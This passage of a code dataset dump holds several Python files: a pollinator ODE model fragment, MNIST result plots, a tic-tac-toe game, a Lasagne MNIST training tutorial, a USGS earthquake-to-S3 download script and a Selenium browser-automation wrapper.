LFR(self, R, P, i, j):\n return self.b[i, j] * R / P\n\n def LFR_vectorized(self, R, P):\n # self.b[i, j] * R / P\n return (self.b.T * (R / P)).T\n\n def NFR(self, R, P, i, j):\n return self.b_max[i, j] * (R[i] / (self.kappa[i, j] * P[i] + R[i]))\n\n def NFR_vectorized(self, R, P):\n # self.b_max[i, j] * (R[i] / (self.kappa[i, j] * P[i] + R))\n return self.b_max * (R / (self.kappa.T * P + R)).T\n\n def ode(self, t, z, dA):\n \"\"\"Full set of ODEs\n\n Returns:\n ODEs [np array]: full set of ODEs\n \"\"\"\n if isinstance(dA, (int, float)):\n _dA = dA\n elif isinstance(dA, (dict)):\n _dA = dA[\"func\"](t, *dA.get(\"args\", None))\n\n # unpack state variables\n P = z[:self.N_p]\n A = z[self.N_p:self.N]\n R = z[self.N:self.N+self.N_p]\n alpha = z[self.N+self.N_p:].reshape((self.N_p, self.N_a))\n\n F = self.LFR_vectorized(R, P)\n\n V = ((alpha * self.tau).T * P).T * A + self.mu\n\n sigma = V / V.sum(axis=0)\n\n gamma = self.g * (1 - self.u @ P - (self.w - self.u) * P)\n\n # calculate the differential equations\n plant_ODEs = gamma * (self.e * sigma * V).sum(axis=1) - (self.mu_p) * P\n\n poll_ODEs = (self.c * V * F).sum(axis=0) - (self.mu_a + _dA) * A\n\n R_ODEs = self.beta * P - self.phi * R - (V * F).sum(axis=1)\n\n alpha_ODEs = (self.G * alpha * (\n ((self.c * self.tau * F).T * P).T -\\\n (self.tau.T * P).T * (alpha * self.c * F).sum(axis=0)\n )).flatten()\n\n return np.concatenate((plant_ODEs, poll_ODEs, R_ODEs, alpha_ODEs))\n\n def solve(self, t_end, dA=0, n_steps=int(1e6), y0=None, save_period=0):\n \"\"\"Numerical solver of ODEs. Makes use of solve_ivp() function of scipy\n\n Returns:\n sol [obj]: numerical solution of ODE in a scipy Bunch object\n \"\"\"\n t_span = (0, t_end)\n\n # If no initial conditions are provided, use default initial conditions.\n if y0 is None:\n y0 = uniform_var(self.rng, 0.5, self.p_var, self.N_p)\n y0 = np.concatenate((y0, uniform_var(self.rng, 0.5, self.p_var, self.N_a)))\n y0 = np.concatenate((y0, uniform_var(self.rng, 0.5, self.p_var, self.N_p)))\n alpha = copy.deepcopy(self.alpha0)\n y0 = np.concatenate((y0, alpha.flatten()))\n\n save_partial = {\n \"ind\": (self.N + self.N_p, y0.shape[0]-1),\n \"save_period\": save_period\n }\n\n t0 = timer()\n sol = solve_ode(\n self.ode, t_span, y0, n_steps, args=(dA,), save_partial=save_partial\n )\n print(f\"Solved Valdovinos Model in {timer()-t0:.2f} seconds...\\n\")\n self.set_sol(sol)\n return sol\n","repo_name":"vvvasconcelos/pollcomm","sub_path":"pollcomm/valdovinos.py","file_name":"valdovinos.py","file_ext":"py","file_size_in_byte":5332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71374672467","text":"import matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport os\nimport pandas as pd\nimport numpy as np\n\nfrom results import *\nimport results as R\nfrom results.utils import *\n\n\ndef plot_confidence_vs_count_60(res_dir_list: List[str]) -> plt.Figure:\n R.LOGGER.info(\"plot_confidence_vs_count_60\")\n # load rotated 60° dataframes\n df_dict = {os.path.basename(path): load_csv(os.path.join(\n path, 'mnist_rotate60.csv')) for path in res_dir_list}\n res_df = pd.DataFrame()\n\n confidence_range = np.arange(0, 1, .01)\n for k in df_dict:\n # select data based on confidence value\n count_list = list()\n for cv in confidence_range:\n count_df = df_dict[k].loc[df_dict[k]['t_confidence'] > cv]\n ratio = count_df.iloc[:, 0].count(\n ) / df_dict[k]['t_confidence'].count()\n count_list.append(ratio)\n\n # save grouped data\n res_df[k] = 
pd.Series(count_list, index=list(confidence_range))\n\n # plot\n fig = plt.figure()\n ax1 = fig.subplots(nrows=1)\n fig.suptitle(\"Confidence vs Count \\n(Rotated 60°)\")\n x_formatter = ticker.FormatStrFormatter(\"%.2f\")\n y_formatter = ticker.PercentFormatter(xmax=1.0)\n\n ax1.xaxis.set_major_formatter(x_formatter)\n ax1.yaxis.set_major_formatter(y_formatter)\n ax1.grid(True)\n ax1.tick_params(grid_linestyle='dotted')\n ax1.set_xlim(0, 1)\n\n for k in res_df:\n ax1.scatter(res_df[k].index, res_df[k], label=k, s=8)\n\n ax1.set_ylabel(r\"Fraction of examples with $p(y|x) > \\tau$\")\n ax1.set_xlabel(r\"Confidence ($\\tau$)\")\n side_legend(ax1)\n return fig\n\n\ndef plot_confidence_vs_accuracy_60(res_dir_list: List[str]) -> plt.Figure:\n R.LOGGER.info(\"plot_confidence_vs_accuracy_60\")\n # load rotated 60° dataframes\n df_dict = {os.path.basename(path): load_csv(os.path.join(\n path, 'mnist_rotate60.csv')) for path in res_dir_list}\n res_df = pd.DataFrame()\n\n X_MAX = .55\n confidence_range = np.arange(0, X_MAX, .01)\n for k in df_dict:\n # select data based on confidence value\n acc_list = list()\n for cv in confidence_range:\n acc_df = df_dict[k].loc[df_dict[k]['t_confidence'] > cv]\n accuracy = get_accuracy(acc_df)\n acc_list.append(accuracy)\n\n # save grouped data\n res_df[k] = pd.Series(acc_list, index=list(confidence_range))\n\n # plot\n fig = plt.figure()\n ax1 = fig.subplots(nrows=1)\n fig.suptitle(\"Confidence vs Accuracy \\n(Rotated 60°)\")\n formatter = ticker.FormatStrFormatter(\"%.2f\")\n\n ax1.xaxis.set_major_formatter(formatter)\n ax1.grid(True)\n ax1.tick_params(grid_linestyle='dotted')\n ax1.set_xlim(0, X_MAX)\n\n for k in res_df:\n ax1.scatter(res_df[k].index, res_df[k], label=k, s=8)\n\n ax1.set_ylabel(r\"Accuracy on examples $p(y|x) > \\tau$\")\n ax1.set_xlabel(r\"Confidence ($\\tau$)\")\n side_legend(ax1)\n return fig\n\n\ndef plot_shifted(res_dir_list: List[str]) -> plt.Figure:\n R.LOGGER.info(\"plot_shifted\")\n # get shifted results\n shifted_df_dict = get_shifted_df(res_dir_list)\n\n # plot\n fig = plt.figure()\n (ax1, ax2) = fig.subplots(nrows=2)\n fig.suptitle(\"Translated\\n(MNIST)\")\n formatter = ticker.FormatStrFormatter(\"%dpx\")\n\n ax1.xaxis.set_major_formatter(formatter)\n ax2.xaxis.set_major_formatter(formatter)\n ax1.grid(True)\n ax2.grid(True)\n ax1.tick_params(grid_linestyle='dotted')\n ax2.tick_params(grid_linestyle='dotted')\n ax1.set_xlim(0, 14)\n ax2.set_xlim(0, 14)\n ax1.set_ylim(0, 1)\n xticks = range(0, 16, 2)\n\n for k in shifted_df_dict:\n ax1.plot(xticks, shifted_df_dict[k]['accuracy'], label=k)\n ax2.plot(xticks, shifted_df_dict[k]['brier_score'], label=k)\n\n ax1.set_ylabel(\"Accuracy\")\n ax2.set_ylabel(\"Brier score\")\n ax2.set_xlabel(\"Pixels translation\")\n side_legend(ax2)\n return fig\n\n\ndef plot_rotated(res_dir_list: List[str]) -> plt.Figure:\n R.LOGGER.info(\"plot_rotated\")\n # get rotated results\n rotated_df_dict = get_rotated_df(res_dir_list)\n\n # plot\n fig = plt.figure()\n (ax1, ax2) = fig.subplots(nrows=2)\n fig.suptitle(\"Rotated\\n(MNIST)\")\n formatter = ticker.FormatStrFormatter(\"%d°\")\n\n ax1.xaxis.set_major_formatter(formatter)\n ax2.xaxis.set_major_formatter(formatter)\n ax1.grid(True)\n ax2.grid(True)\n ax1.tick_params(grid_linestyle='dotted')\n ax2.tick_params(grid_linestyle='dotted')\n ax1.set_xlim(0, 180)\n ax2.set_xlim(0, 180)\n ax1.set_ylim(0, 1)\n xticks = range(0, 195, 15)\n\n for k in rotated_df_dict:\n ax1.plot(xticks, rotated_df_dict[k]['accuracy'], label=k)\n ax2.plot(xticks, 
rotated_df_dict[k]['brier_score'], label=k)\n\n ax1.set_ylabel(\"Accuracy\")\n ax2.set_ylabel(\"Brier score\")\n ax2.set_xlabel(\"Degrees of rotation\")\n side_legend(ax2)\n return fig\n","repo_name":"FilippoVajana/master-degree","sub_path":"results/shifted_plots.py","file_name":"shifted_plots.py","file_ext":"py","file_size_in_byte":4851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24547211490","text":"import random\r\n\r\ndef print_board(board):\r\n print(\"|\" + board[0] + \"|\" + board[1] + \"|\" + board[2] + \"|\")\r\n print(\"|\" + board[3] + \"|\" + board[4] + \"|\" + board[5] + \"|\")\r\n print(\"|\" + board[6] + \"|\" + board[7] + \"|\" + board[8] + \"|\")\r\n\r\ndef player_move(board, player):\r\n position = int(input(\"Pick a position from 0 to 8:\"))\r\n if position >= 0 and position <= 8 and board[position] == '_':\r\n board[position] = player\r\n else:\r\n print(\"That's not a valid location\")\r\n\r\ndef computer_move(board):\r\n position = random.randint(0, 8)\r\n while board[position] != '_':\r\n position = random.randint(0, 8)\r\n board[position] = 'O'\r\n\r\ndef winner(board):\r\n winning_positions = [\r\n [0, 1, 2], [3, 4, 5], [6, 7, 8], # rows\r\n [0, 3, 6], [1, 4, 7], [2, 5, 8], # columns\r\n [0, 4, 8], [2, 4, 6] # diagonals\r\n ]\r\n for pos in winning_positions:\r\n if all(board[p] == 'X' for p in pos):\r\n return 'X'\r\n elif all(board[p] == 'O' for p in pos):\r\n return 'O'\r\n if '_' not in board:\r\n return 'Tie'\r\n return None\r\n\r\ndef play_game():\r\n board = ['_' for _ in range(9)]\r\n print(\"Ready to play Tic Tac Toe!\")\r\n print_board(board)\r\n player = 'X'\r\n while True:\r\n if player == 'X':\r\n player_move(board, player)\r\n else:\r\n computer_move(board)\r\n print_board(board)\r\n result = winner(board)\r\n if result is not None:\r\n if result == 'Tie':\r\n print(\"It's a tie!\")\r\n else:\r\n print(f\"{result} won!\")\r\n break\r\n player = 'X' if player == 'O' else 'O'\r\n\r\nplay_game()\r\n","repo_name":"chaos-hunter/Tictactoe-proj","sub_path":"TICTACTOE.py","file_name":"TICTACTOE.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7785673545","text":"'''\nLasagne MNIST Example / Tutorial\n\n'''\n\nfrom __future__ import print_function\n\nimport cPickle as pickle\nimport gzip\nimport itertools\nimport urllib\n\nimport numpy as np\nimport lasagne\nimport theano\nimport theano.tensor as T\n\n\nDATA_URL = 'http://deeplearning.net/data/mnist/mnist.pkl.gz'\nDATA_FILENAME = 'mnist.pkl.gz'\n\nNUM_EPOCHS = 500\nBATCH_SIZE = 600\nNUM_HIDDEN_UNITS = 512\nLEARNING_RATE = 0.01\nMOMENTUM = 0.9\n\n\ndef _load_data(url=DATA_URL, filename=DATA_FILENAME):\n urllib.urlretrieve(url, filename)\n with gzip.open(filename, 'rb') as f:\n data = pickle.load(f)\n return data\n\ndef load_data():\n data = _load_data()\n X_train, y_train = data[0]\n X_valid, y_valid = data[1]\n X_test, y_test = data[2]\n\n return dict(\n X_train=theano.shared(lasagne.utils.floatX(X_train)),\n y_train=T.cast(theano.shared(y_train), 'int32'),\n X_valid=theano.shared(lasagne.utils.floatX(X_valid)),\n y_valid=T.cast(theano.shared(y_valid), 'int32'),\n X_test=theano.shared(lasagne.utils.floatX(X_test)),\n y_test=T.cast(theano.shared(y_test), 'int32'),\n num_examples_train=X_train.shape[0],\n num_examples_valid=X_valid.shape[0],\n num_examples_test=X_test.shape[0],\n input_dim=X_train.shape[1],\n output_dim=10,\n )\n\ndef 
build_model(input_dim, output_dim,\n batch_size=BATCH_SIZE, num_hidden_units=NUM_HIDDEN_UNITS):\n\n '''\n Define neural net structure. \n\n Tune neural net hyper parameters input, output and hidden number of units.\n\n '''\n l_in = lasagne.layers.InputLayer(\n shape=(batch_size, input_dim),\n )\n l_hidden1 = lasagne.layers.DenseLayer(\n l_in,\n num_units=num_hidden_units,\n nonlinearity=lasagne.nonlinearities.rectify,\n )\n # Regularizatoin with dropout -randomly drop neurons and connections in training\n l_hidden1_dropout = lasagne.layers.DropoutLayer(\n l_hidden1,\n p=0.5,\n )\n l_hidden2 = lasagne.layers.DenseLayer(\n l_hidden1_dropout,\n num_units=num_hidden_units,\n nonlinearity=lasagne.nonlinearities.rectify,\n )\n l_hidden2_dropout = lasagne.layers.DropoutLayer(\n l_hidden2,\n p=0.5,\n )\n l_out = lasagne.layers.DenseLayer(\n l_hidden2_dropout,\n num_units=output_dim,\n nonlinearity=lasagne.nonlinearities.softmax,\n )\n\n return l_out\n\ndef create_iter_functions(dataset, output_layer,\n X_tensor_type=T.matrix,\n batch_size=BATCH_SIZE,\n learning_rate=LEARNING_RATE, momentum=MOMENTUM):\n '''\n Define neural net methods to tune structure\n '''\n\n batch_index = T.iscalar('batch_index')\n X_batch = X_tensor_type('x')\n y_batch = T.ivector('y')\n batch_slice = slice(batch_index * batch_size, (batch_index + 1) * batch_size)\n\n def loss(output): # negative log likelihood\n return -T.mean(T.log(output)[T.arange(y_batch.shape[0]), y_batch])\n\n loss_train = loss(output_layer.get_output(X_batch))\n loss_eval = loss(output_layer.get_output(X_batch, deterministic=True))\n\n pred = T.argmax(\n output_layer.get_output(X_batch, deterministic=True), axis=1)\n\n accuracy = T.mean(T.eq(pred, y_batch)) # error rate\n\n all_params = lasagne.layers.get_all_params(output_layer)\n updates = lasagne.updates.nesterov_momentum(\n loss_train, all_params, learning_rate, momentum)\n\n iter_train = theano.function(\n [batch_index], loss_train,\n updates=updates,\n givens={\n X_batch: dataset['X_train'][batch_slice],\n y_batch: dataset['y_train'][batch_slice],\n },\n )\n\n iter_valid = theano.function(\n [batch_index], [loss_eval, accuracy],\n givens={\n X_batch: dataset['X_valid'][batch_slice],\n y_batch: dataset['y_valid'][batch_slice],\n },\n )\n\n iter_test = theano.function(\n [batch_index], [loss_eval, accuracy],\n givens={\n X_batch: dataset['X_test'][batch_slice],\n y_batch: dataset['y_test'][batch_slice],\n },\n )\n\n return dict(\n train=iter_train,\n valid=iter_valid,\n test=iter_test,\n )\n\n\ndef train(iter_funcs, dataset, batch_size=BATCH_SIZE):\n num_batches_train = dataset['num_examples_train'] // batch_size\n num_batches_valid = dataset['num_examples_valid'] // batch_size\n num_batches_test = dataset['num_examples_test'] // batch_size\n\n for epoch in itertools.count(1):\n batch_train_losses = []\n for b in range(num_batches_train):\n batch_train_loss = iter_funcs['train'](b)\n batch_train_losses.append(batch_train_loss)\n\n avg_train_loss = np.mean(batch_train_losses)\n\n batch_valid_losses = []\n batch_valid_accuracies = []\n for b in range(num_batches_valid):\n batch_valid_loss, batch_valid_accuracy = iter_funcs['valid'](b)\n batch_valid_losses.append(batch_valid_loss)\n batch_valid_accuracies.append(batch_valid_accuracy)\n\n avg_valid_loss = np.mean(batch_valid_losses)\n avg_valid_accuracy = np.mean(batch_valid_accuracies)\n\n yield {\n 'number': epoch,\n 'train_loss': avg_train_loss,\n 'valid_loss': avg_valid_loss,\n 'valid_accuracy': avg_valid_accuracy,\n } \n\n\ndef 
main(num_epochs=NUM_EPOCHS):\n print('... loading and seting-up data')\n dataset = load_data()\n\n print('... building the model structure')\n output_layer = build_model(\n input_dim=dataset['input_dim'],\n output_dim=dataset['output_dim'],\n )\n iter_funcs = create_iter_functions(dataset, output_layer)\n\n print('... training the model')\n for epoch in train(iter_funcs, dataset):\n print(\"Epoch %d of %d\" % (epoch['number'], num_epochs))\n print(\" training loss:\\t\\t%.6f\" % epoch['train_loss'])\n print(\" validation loss:\\t\\t%.6f\" % epoch['valid_loss'])\n print(\" validation accuracy:\\t\\t%.2f %%\" %\n (epoch['valid_accuracy'] * 100))\n\n if epoch['number'] >= num_epochs:\n break\n\n return output_layer\n\n\nif __name__ == '__main__':\n main()","repo_name":"nyghtowl/Neural_Net_Newbies","sub_path":"lib/lasagne_mnist.py","file_name":"lasagne_mnist.py","file_ext":"py","file_size_in_byte":6265,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"48"} +{"seq_id":"30062924616","text":"#!/usr/bin/python3\n\"\"\"\nretroactive_month.py was written to collect data from the beginning of the\ncurrent API version, May 22nd, 2013\nThe month parameter was limited to 30 days due to a \"Error 400: Bad Request\nmatching events exceeds search limit of 20000\"\nWith a little investigation, the average month contained 11,000 events\n\"\"\"\nimport yaml\nimport os\nimport requests\nimport datetime\nfrom boto.s3.connection import S3Connection\nfrom boto.s3.key import Key\n\ndef main(months):\n \"\"\"\n Take in one argument, months: int\n This pulls all earthquakes recored monthly (30 days)\n 1. Import credentials\n 2. Connect to S3, 'bucketshakesforyou'\n 3. Create date specific timestamp\n 4. Pull from usgs.gov website\n 5. Save as json string\n 6. Create Key(s) based on relevant day(s) timestamp\n 7. 
Push to S3\n    \"\"\"\n\n    credentials = yaml.load(open(os.path.expanduser\n                                 ('/vagrant/credentials.yml')))\n\n    aws_cred = credentials['aws']\n    conn = S3Connection(aws_access_key_id=aws_cred['access_key_id'],\n                        aws_secret_access_key=aws_cred['secret_access_key'])\n\n    production_version = datetime.date(2013,5,22)\n    beg_month = production_version\n    # for more robust code:\n    # today = datetime.date.today()\n    # while end_day < today:\n    #     if end_day > today:\n    #         end_day = today\n    for month in range(1, months):\n        bucket = conn.get_bucket('bucketshakesforyou')\n        end_month = datetime.timedelta(days=30)\n        end_day = beg_month + end_month\n        start_day = beg_month\n        start = start_day.strftime('%Y-%m-%d')\n        end = end_day.strftime('%Y-%m-%d')\n        url_str = \"https://earthquake.usgs.gov/fdsnws/event/1/query?format=geojson&\"\\\n                  + \"starttime=\" + start + \"&endtime=\" + end\n\n        r = requests.get(url_str)\n\n        k = Key(bucket)\n        k.key = start\n        k.set_contents_from_string(r.text)\n        beg_month += end_month\n\n\nif __name__ == '__main__':\n    # to capture all data from production_version until current date the month\n    # parameter was set to 49\n    main(49)\n","repo_name":"adamszabunio/ShakeShakeShake","sub_path":"retroactive_month.py","file_name":"retroactive_month.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"74386014865","text":"import os\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver import DesiredCapabilities, ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom UI_framework.Logger import Logger\n\n\nclass BlueRose(object):\n    \"\"\"\n    A second-layer wrapper over the selenium framework that makes common actions more expressive\n    \"\"\"\n\n    def logging(func):\n        logger = Logger('blueRose.log', level='debug').logger\n\n        def wrapper(*args, **kwargs):\n            if (args.__len__() > 1):\n                logger.info(func.__name__ + ' executes ' + args[1])\n            else:\n                logger.info(func.__name__ + ' executes')\n            return func(*args, **kwargs)\n\n        return wrapper\n\n    #\n    def __init__(self, browser='firefox', isMultitask=False):\n        self.logger = Logger('blueRose.log', level='debug').logger\n        self.seconds = 30\n        # list for storing error screenshots\n        self.imgs = []\n        if isMultitask:\n            self.initMultitaskDriver(browser, serverUrl='http://localhost:4444/wd/hub')\n        else:\n            self.initDriver(browser)\n\n    def initDriver(self, browser='firefox', wait_time=5):\n        \"\"\"\n        Browser: defaults to Firefox, but Chrome or IE can be chosen;\n        the wait time used when opening the browser defaults to 5s and can be changed;\n        if the given browser is not one of \"firefox\" \"Firefox\" \"chrome\" \"Chrome\" \"ie\" \"IE\", assert False\n        \"\"\"\n        try:\n            if browser == \"firefox\" or browser == \"Firefox\":\n                self.driver = webdriver.Firefox()\n            elif browser == \"chrome\" or browser == \"Chrome\":\n                self.driver = webdriver.Chrome()\n            elif browser == \"ie\" or browser == \"IE\":\n                self.driver = webdriver.Ie()\n            self.driver.implicitly_wait(wait_time)\n        except Exception:\n            self.logger.error(\"Browser not found. You can enter 'firefox', 'chrome', 'ie'.\")\n            assert False\n\n    def initMultitaskDriver(self, browser='firefox', serverUrl='http://127.0.0.1:4444/wd/hub', wait_time=5):\n        try:\n            if browser == \"firefox\" or browser == \"Firefox\":\n                self.driver = webdriver.Remote(command_executor=serverUrl,\n                                               desired_capabilities=DesiredCapabilities.FIREFOX)\n            elif browser == \"chrome\" or browser == \"Chrome\":\n                self.driver = webdriver.Remote(command_executor=serverUrl,\n                                               desired_capabilities=DesiredCapabilities.CHROME)\n\n            elif browser == \"ie\" or browser == \"IE\":\n                self.driver = webdriver.Remote(command_executor=serverUrl,\n                                               desired_capabilities=DesiredCapabilities.INTERNETEXPLORER)\n            self.driver.implicitly_wait(wait_time)\n        except Exception:\n            self.logger.error(\"Browser not found. You can enter 'firefox', 'chrome', 'ie'.\")\n            assert False\n\n    def get(self, url):\n        \"\"\"\n        Open a URL.\n\n        Example: open Baidu\n        driver.get(\"https://www.baidu.com\")\n        \"\"\"\n        self.driver.get(url)\n\n    def max_window(self):\n        \"\"\"\n        Maximize the current window.\n\n        Example: maximize the current window\n        driver.max_window()\n        \"\"\"\n        self.driver.maximize_window()\n\n    def set_window_size(self, wide, high):\n        \"\"\"\n        Set the browser window size.\n\n        Example: set the browser size to width 1000, height 1000\n        driver.set_window_size(1000,1000)\n        \"\"\"\n        self.driver.set_window_size(wide, high)\n\n    def wait(self, seconds):\n        \"\"\"\n        Set the implicit wait time.\n\n        Example: wait 10s\n        driver.wait(10)\n        \"\"\"\n        self.driver.implicitly_wait(seconds)\n\n    def find_element(self, element):\n        \"\"\"\n        Choose a locator strategy and locate the element; strategy and value are joined with \"=\"\n\n        Example:\n        driver.find_element(\"id=kw\")\n        \"\"\"\n        if \"=\" not in element:\n            self.logger.error(\"SyntaxError: invalid syntax, lack of '='.\")\n            assert False\n        else:\n            try:\n                \"\"\"\n                Parse the locator type and the corresponding value from the input\n                types: \"id\",\"name\",\"class\",\"text\",\"xpath\",\"css\"\n                \"\"\"\n                by = element[0: element.find(\"=\")]\n                value = element[element.find(\"=\") + 1: len(element)]\n\n                if by == \"id\":\n                    WebDriverWait(self.driver, self.seconds, 1).until(\n                        EC.visibility_of_element_located((By.ID, value)))\n                    return self.driver.find_element_by_id(value)\n                elif by == \"name\":\n                    WebDriverWait(self.driver, self.seconds, 1).until(\n                        EC.visibility_of_element_located((By.NAME, value)))\n                    return self.driver.find_element_by_name(value)\n                elif by == \"class\":\n                    WebDriverWait(self.driver, self.seconds, 1).until(\n                        EC.visibility_of_element_located((By.CLASS_NAME, value)))\n                    return self.driver.find_element_by_class_name(value)\n                elif by == \"text\":\n                    WebDriverWait(self.driver, self.seconds, 1).until(\n                        EC.visibility_of_element_located((By.LINK_TEXT, value)))\n                    return self.driver.find_element_by_link_text(value)\n                elif by == \"xpath\":\n                    WebDriverWait(self.driver, self.seconds, 1).until(\n                        EC.visibility_of_element_located((By.XPATH, value)))\n                    return self.driver.find_element_by_xpath(value)\n                elif by == \"css\":\n                    WebDriverWait(self.driver, self.seconds, 1).until(\n                        EC.visibility_of_element_located((By.CSS_SELECTOR, value)))\n                    return self.driver.find_element_by_css_selector(value)\n                else:\n                    self.logger.error(\n                        \"Please enter the correct targeting elements,'id','name','class','text','xpath','css'.\")\n                    assert False\n            except Exception:\n                # self.imgs.append(self.driver.get_screenshot_as_base64())\n                self.logger.exception(\"Timed out, cannot find the element. The screenshot is: \" + self.get_screenshot())\n                assert False\n\n    def find_elements(self, element, index):\n        \"\"\"\n        Determine the locator strategy and index, and return the matching element.\n\n        Example: return the element with id kw at the given index\n        driver.find_elements(\"id=kw\",1)\n        \"\"\"\n        if \"=\" not in element:\n            self.logger.error(\"SyntaxError: invalid syntax, lack of '='.\")\n            assert False\n        else:\n            try:\n                by = element[0: element.find(\"=\")]\n                value = element[element.find(\"=\") + 1:len(element)]\n\n                if by == \"id\":\n                    WebDriverWait(self.driver, self.seconds, 1).until(\n                        EC.visibility_of_element_located((By.ID, value)))\n                    return self.driver.find_elements_by_id(value)[index]\n                elif by == \"name\":\n                    WebDriverWait(self.driver, self.seconds, 1).until(\n                        EC.visibility_of_element_located((By.NAME, value)))\n                    return self.driver.find_elements_by_name(value)[index]\n                elif by == \"class\":\n                    WebDriverWait(self.driver, self.seconds, 1).until(\n                        EC.visibility_of_element_located((By.CLASS_NAME, value)))\n                    return self.driver.find_elements_by_class_name(value)[index]\n                elif by == \"text\":\n                    WebDriverWait(self.driver, self.seconds, 1).until(\n                        EC.visibility_of_element_located((By.LINK_TEXT, value)))\n                    return self.driver.find_elements_by_link_text(value)[index]\n                elif by == \"xpath\":\n                    WebDriverWait(self.driver, self.seconds, 1).until(\n                        EC.visibility_of_element_located((By.XPATH, value)))\n                    return self.driver.find_elements_by_xpath(value)[index]\n                elif by == \"css\":\n                    WebDriverWait(self.driver, self.seconds, 1).until(\n                        EC.visibility_of_element_located((By.CSS_SELECTOR, value)))\n                    return self.driver.find_elements_by_css_selector(value)[index]\n                elif by == \"tagName\":\n                    WebDriverWait(self.driver, self.seconds, 1).until(\n                        EC.visibility_of_element_located((By.TAG_NAME, value)))\n                    return self.driver.find_elements_by_tag_name(value)[index]\n                else:\n                    self.logger.error(\n                        \"Please enter the correct targeting elements,'id','name','class','text','xpath','css'.\")\n                    assert False\n            except Exception:\n                self.logger.exception(\"Timed out, cannot find the element. The screenshot is: \" + self.get_screenshot())\n                assert False\n\n    def send_keys(self, element, text):\n        \"\"\"\n        Locate an element and type text into it.\n        Example: locate the text box with id kw and type selenium\n        driver.send_keys(\"id=kw\",\"selenium\")\n        \"\"\"\n        element = self.find_element(element)\n        element.clear()\n        element.send_keys(text)\n\n    def send_keyBoardsEvent(self, element, keyEvent):\n        \"\"\"\n        Send a keyboard event to an element.\n\n        Example: locate id kw and press Enter\n        driver.send_keyBoardsEvent(\"id=kw\", Keys.ENTER)\n        \"\"\"\n        self.find_element(element).send_keys(keyEvent)\n\n    def send_keys_index(self, element, index, text):\n        \"\"\"\n        Clear the field first, then type.\n\n        Example: clear, then type selenium\n        driver.send_keys_index(\"id=kw\",5,\"selenium\")\n        \"\"\"\n        element = self.find_elements(element, index)\n        element.clear()\n        element.send_keys(text)\n\n    def click(self, element):\n        \"\"\"\n        Locate an element and click it\n\n        Example: locate the element with id kw and click it\n        driver.click(\"id=kw\")\n        \"\"\"\n        self.find_element(element).click()\n\n    def click_index(self, element, index):\n        \"\"\"\n        Find the element at the given index and click it\n\n        Example: click the 5th element with id kw\n        driver.click_index(\"id=kw\",5)\n        \"\"\"\n        self.find_elements(element, index).click()\n\n    def right_click(self, element):\n        \"\"\"\n        Find an element and right-click it\n\n        Example:\n        driver.right_click(\"class=right\")\n        \"\"\"\n        ActionChains(self.driver).context_click(self.find_element(element)).perform()\n\n    def move_to_element(self, element):\n        \"\"\"\n        Move the mouse over an element\n\n        Example: hover over the element with css choose\n        driver.move_to_element(\"css=choose\")\n        \"\"\"\n        ActionChains(self.driver).move_to_element(self.find_element(element)).perform()\n\n    def double_click(self, element):\n        \"\"\"\n        Find an element and double-click it.\n\n        Example: double-click the element whose name is baidu\n        driver.double_click(\"name=baidu\")\n        \"\"\"\n        ActionChains(self.driver).double_click(self.find_element(element)).perform()\n\n    def drag_and_drop(self, source_element, target_element):\n        \"\"\"\n        Drag an element onto a target element.\n\n        Example: drag the element with id s onto the element with id t\n        driver.drag_and_drop(\"id=s\",\"id=t\")\n        \"\"\"\n        ActionChains(self.driver).drag_and_drop(self.find_element(source_element),\n                                                self.find_element(target_element)).perform()\n\n    def back(self):\n        \"\"\"\n        Go back one page, like the browser's back arrow.\n\n        Example: go back to the previous page\n        driver.back()\n        \"\"\"\n        self.driver.back()\n\n    def forward(self):\n        \"\"\"\n        Go forward one page, like the browser's forward arrow.\n\n        Example: go forward to the next page\n        driver.forward()\n        \"\"\"\n        self.driver.forward()\n\n    def get_attribute(self, element, attribute):\n        \"\"\"\n        Get the value of an element's attribute.\n\n        Example: get an attribute value of the element with id kw\n        driver.get_attribute(\"id=kw\",\"attribute\")\n        \"\"\"\n        return self.find_element(element).get_attribute(attribute)\n\n    def get_text(self, element):\n        \"\"\"\n        Get the element's text content.\n\n        Example:\n        driver.get_text(\"name=johnny\")\n        \"\"\"\n        return self.find_element(element).text\n\n    def get_display(self, element):\n        \"\"\"\n        Check whether the element is displayed; returns True or False.\n\n        Example: check whether the element with id ppp is displayed\n        driver.get_display(\"id=ppp\")\n        \"\"\"\n        return self.find_element(element).is_displayed()\n\n    def get_title(self):\n        \"\"\"\n        Get the page title.\n\n        Example:\n        driver.get_title()\n        \"\"\"\n        return self.driver.title\n\n    def get_url(self):\n        \"\"\"\n        Get the URL of the current page.\n\n        Example:\n        driver.get_url()\n        \"\"\"\n        return self.driver.current_url\n\n    def get_screenshot_as_base64(self):\n        return self.driver.get_screenshot_as_base64()\n\n    def get_screenshot(self):\n        \"\"\"\n        Take a screenshot and save it\n\n        Example: take a screenshot of the current page\n        driver.get_screenshot()\n        \"\"\"\n        current_time = time.strftime(\"%Y-%m-%d-%H_%M_%S\", time.localtime(time.time()))\n        current_date = time.strftime(\"%Y-%m-%d\", time.localtime(time.time()))\n        pic_path = os.path.abspath(os.path.dirname(os.getcwd())) + \"\\\\result\\\\screenshot\\\\\" + current_date\n        pic_name = current_time + '.png'\n        if os.path.exists(pic_path):\n            pass\n        else:\n            # create the nested directories\n            os.makedirs(pic_path)\n        self.driver.get_screenshot_as_file(pic_path + '\\\\' + pic_name)\n        return pic_path + '\\\\' + pic_name\n\n    def submit(self, element):\n        \"\"\"\n        Submit a form.\n\n        Example:\n        driver.submit(\"id=mainFrame\")\n        \"\"\"\n        self.find_element(element).submit()\n\n    def switch_to_frame(self, element):\n        \"\"\"\n        Switch into a frame.\n\n        Example: switch to the frame with id mainFrame\n        driver.switch_to_frame(\"id=mainFrame\")\n        \"\"\"\n        